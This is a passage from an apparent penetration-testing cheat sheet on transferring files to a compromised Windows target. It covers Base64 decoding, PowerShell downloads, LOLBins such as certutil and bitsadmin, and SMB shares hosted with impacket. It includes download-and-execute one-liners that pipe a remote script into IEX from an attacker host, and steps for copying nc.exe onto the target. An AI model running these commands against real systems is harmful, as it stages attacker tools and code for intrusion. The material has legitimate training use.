A checksum is a unique value used to check if a file is unchanged. It helps detect errors or tampering. On Windows, you can use Get-FileHash to generate one.
# Checksum using MD5Get-FileHash C:\Users\Public\test.txt -Algorithm md5# Checksum using SHA1Get-FileHash C:\Users\Public\test.txt -Algorithm sha1
Copy/Paste Base64
# Decode Base64 string and save it into Windows target[IO.File]::WriteAllBytes("C:\Users\Public\test.txt", [Convert]::FromBase64String("SGVsbG8sV29ybGQK"))
Warning
While this method is convenient, it’s not always possible to use. Windows Command Line utility (cmd.exe) has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings.
Powershell Web Downloads
# Download a file into disk(New-Object Net.WebClient).DownloadFile('http://$IP/test.txt','C:\Users\Public\test.txt')# Download a file into disk (in the background)(New-Object Net.WebClient).DownloadFileAsync('http://$IP/test.txt', 'C:\Users\Public\test.txt')# Download a file in memory IEX (New-Object Net.WebClient).DownloadString('http://$IP/test.ps1')# Download a file in memory (IEX as pipeline)(New-Object Net.WebClient).DownloadString('http://$IP/test.ps1') | IEX
Error
There may be cases where a target machine using Internet Explorer, fails to download files because its initial setup hasn’t been completed.
The error may look something like this: ...cannot be parsed because the Internet Explorer engine is not available...
This can be bypassed using the parameter -UseBasicParsing.
“Living off the land” was first used by Christopher Campbell @obscuresec and Matt Graeber @mattifestation at DerbyCon 3. The term LOLBins (Living off the Land Binaries) originated from a Twitter discussion about binaries that attackers can misuse for unintended actions.
On Windows, we can use the LOLBAS website to search for binaries that perform various functions. To find binaries for downloading or uploading files, use the /download or /upload operators.
Here are some commonly used tools for downloading files:
# Download a file using bitsadminbitsadmin /transfer wcb /priority foreground http://$IP/test.txt C:\Users\Public\test.txt# Download a file using certutilcertutil.exe -urlcache -split -f http://$IP/test.txt test.txt
SMB Downloads
The Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network.
For transferring files using SMB, we need to set up an SMB server on our attack machine, then copy or move the files between the attack and target machines.
# Create the SMB server (Attacker machine)sudo impacket-smbserver share -smb2support /tmp/smbshare# Copy a file from the SMB Server (Target machine)> copy \\$IP\share\nc.exe
Newer versions of Windows block unauthenticated guest access to SMB. To bypass this, we can set up an SMB server with authentication and then mount it on the target machine.
# Create the SMB server with Authentication (Attacker machine)sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test# Mount the SMB server (Target machine)> net use n: \\$IP\share /user:test test > copy n:\nc.exe
Disconnect
To disconnect, run the following command:
net use n: /delete
FTP Downloads
The File Transfer Protocol (FTP) is a standard communication protocol used for transferring computer files between a server and a client on a network. It operates as a clear-text protocol, meaning that data is sent in an unencrypted format.